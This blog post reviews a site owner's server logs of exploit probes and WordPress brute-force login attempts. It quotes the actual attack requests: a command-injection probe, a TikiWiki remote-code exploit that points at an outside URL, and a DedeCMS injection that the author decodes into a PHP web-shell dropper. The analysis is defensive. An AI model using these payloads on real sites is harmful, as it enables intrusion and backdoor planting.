Website Attacks

I got bored, and started looking through some old logs… Boy howdy, do they NOT impress.

Generic Internet Hacking

Log Entry 85.159.178.172 – – [14/Apr/2013:19:44:56 -0400] “GET /page/21/admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1” 404 25204 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.0;
en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1”
Country of Origin Italy
Source/Comments/Notes http://www.exploit-db.com/exploits/9005/, an attack from 2009 in 2013… stop trying.

 

Log Entry 64.207.145.168 – – [03/Jun/2013:00:31:28 -0400] “GET /admin/record_company.php/password_forgotten.php HTTP/1.1” 404 25363 “-” “Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X
; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16”
Country of Origin USA
Source/Comments/Notes http://www.exploit-db.com/exploits/9004/, an iphone doing a zencart exploit from 2009?! Sigh

 

Log Entry 49.74.106.137 – – [25/Nov/2012:22:35:15 -0500] “GET /mysqlmanager/ HTTP/1.1” 404 21291 “-” “-“
Country of Origin China
Source/Comments/Notes This is just common Internet noise, there are TONS of scans like this all the time.

 

Log Entry 74.60.1.243 – – [12/Nov/2012:12:18:19 -0500] “GET /wp-content/uploads/2012/08/This_Is_Bryan_Checking_Out_Your_Life_Text_Me_If_You_See_This_hahaha_You_Hacker1.html HTTP/1.1” 40
4 5348 “-” “Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0”
Country of Origin USA
Source/Comments/Notes Apparently friends will even leave you 404 messages.

 

Log Entry 42.120.41.71 – – [28/Oct/2012:10:34:23 -0400] “GET /ad12/plugins/access.ssh/checkInstall.php?destServer=%7C%7Cecho%2043176 HTTP/1.1” 404 425 “-” “Googlebot/2.1 (+http://www.googlebot.com/bot.html)”
Country of Origin China
Source/Comments/Notes http://www.metasploit.com/modules/exploit/multi/http/ajaxplorer_checkinstall_exec The cool thing is this was 16 days after initial metasploit release.  Given time to scan all the internet for it, they at least got around fairly quickly to me.

 

Log Entry 91.224.160.141 – – [30/Oct/2012:22:15:26 -0400] “GET /wp-content/pluginswp-property/action_hooks.php HTTP/1.1” 404 5334 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Geck
o/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)”
Country of Origin Netherlands
Source/Comments/Notes Stupid is as stupid does.  What this idiot was TRYING to do was http://www.exploit-db.com/exploits/18987/, the problem being they forgot a / between plugins and wp-property.  <sigh>

 

Log Entry 91.224.160.141 – – [30/Oct/2012:22:15:31 -0400] “GET /wp-content/pluginswp-filemanager/fm.php HTTP/1.1” 404 5334 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100
115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)”
Country of Origin Netherlands
Source/Comments/Notes Same idiot, same problem.  Wonder why you aren’t getting any good hits?! http://packetstormsecurity.com/files/121637/WordPress-wp-FileManager-File-Download.html

 

Log Entry 91.214.72.40 – – [10/Oct/2012:11:55:34 -0400] “GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=?src=http%3A%2F%2Fblogger.com.tunegrotto.com
%2FIN.php HTTP/1.1” 404 23635 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”
Country of Origin Italy
Source/Comments/Notes I hope this 5yr old exploit isn’t still working… yikes. http://www.metasploit.com/modules/exploit/unix/webapp/tikiwiki_graph_formula_exec

 

Log Entry 38.111.147.84 – – [04/May/2013:13:15:22 -0400] “GET /sfs3/modules/school_calendar/?act=getYearView&this_date=2012-08-01 HTTP/1.0” 404 5521 “-” “TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)”
Country of Origin USA
Source/Comments/Notes Not really sure about this one, not much info on sfs3…

 

Log Entry 78.85.76.103 – – [24/Apr/2013:19:31:36 -0400] “POST /wp-content/themes/famous/megaframe/megapanel/inc/upload.php HTTP/1.1” 404 25185 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http:
//www.google.com/bot.html)”
Country of Origin Russia
Source/Comments/Notes 8 months after release… http://secunia.com/advisories/49611/

 

Log Entry 78.85.76.103 – – [24/Apr/2013:19:31:34 -0400] “POST /wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php HTTP/1.1” 404 25185 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”
Country of Origin Russia
Source/Comments/Notes http://www.webologist.co.uk/internet-security/another-russian-invasion-wordpress-uploadify-targeted (they tried 39 different targets… thorough at least!)

 

Log Entry 211.24.68.143 – – [27/Jun/2013:05:20:14 -0400] “GET /HNAP1/ HTTP/1.1” 404 428 “http://108.3.191.212/” “Opera/6.x (Linux 2.4.8-26mdk i686; U) [en]”
Country of Origin Malaysia
Source/Comments/Notes http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf I bought a dlink device once, never again.

More Interesting Traffic

So there is one that took a little try to figure out:

Log Entry 198.20.175.42 – – [28/Jun/2013:11:52:16 -0400] “GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=49&arrs2[]=49&arrs2[]=55&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39
Country of Origin Canada
Source/Comments/Notes Now this one is actually interesting.  It looks fairly, normal, but the thing to realize is that “arrs1” and “arrs2” are arrays of numbers.  Those numbers are ascii representation of letters (http://www.asciitable.com/).  So what happens when we work with this a little more.

var test = "&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=49&arrs2[]=49&arrs2[]=55&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96"
test = test.split("&") // make the string an array so each item will be like arrs1[]=99
for(i=0;i<test.length;i++){test[i] = test[i].split("=")[1]} //for each item, just pull the number
var output = "" //make a placeholder for the answer
for(i=0;i<test.length;i++){output+=String.fromCharCode(test[i])} //convert number to ascii
alert(output)

 

And we get: cfg_dbprefixmytag` (aid,expbody,normbody) VALUES(1117,@`\’`,'{dede:php}file_put_contents(”mybak.php”,”<?pev($_POST[mybak]);?>”);{/dede:php}’) # @`\’`

Brute Force Login Attempt

So then we get into the fun stuff, I’ve had 2 brute force login operations.

178.151.216.53 (Ukraine) – – [20/Jun/2013:10:38:26 -0400] “POST /wp-login.php HTTP/1.1” 200 4383 “http://rageweb.info/wp-login.php” “Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 [xUSAx]”

Someone in the Ukraine has 689 login attempts between 19/Jun/2013:21:26:32 and 20/Jun/2013:10:38:26.  53 login attempts a minute… good try?

DISTRIBUTED Brute Force Login Attempt

The last one is WAY more complex.  Its done through a DISTRIBUTED way, involving Amazon S3 servers, and many others.  The key give away to me was:

67.40.83.2 – – [27/Jun/2013:00:01:51 -0400] “POST /wp-login.php HTTP/1.0” 403 439 “-” “Mozilla/3.0 (compatible; Indy Library)”

A total of 628 login attempts starting back in October.  It gets better though, total amount of countries involved: 46. 278 unique IPs utilized for the attack.  Some crafty stuff!  Below is a graph of all the UNIQUE IPs country of origin, and how many from that country.  Surprised to see GB doubling CN.

dist_login

Comments are closed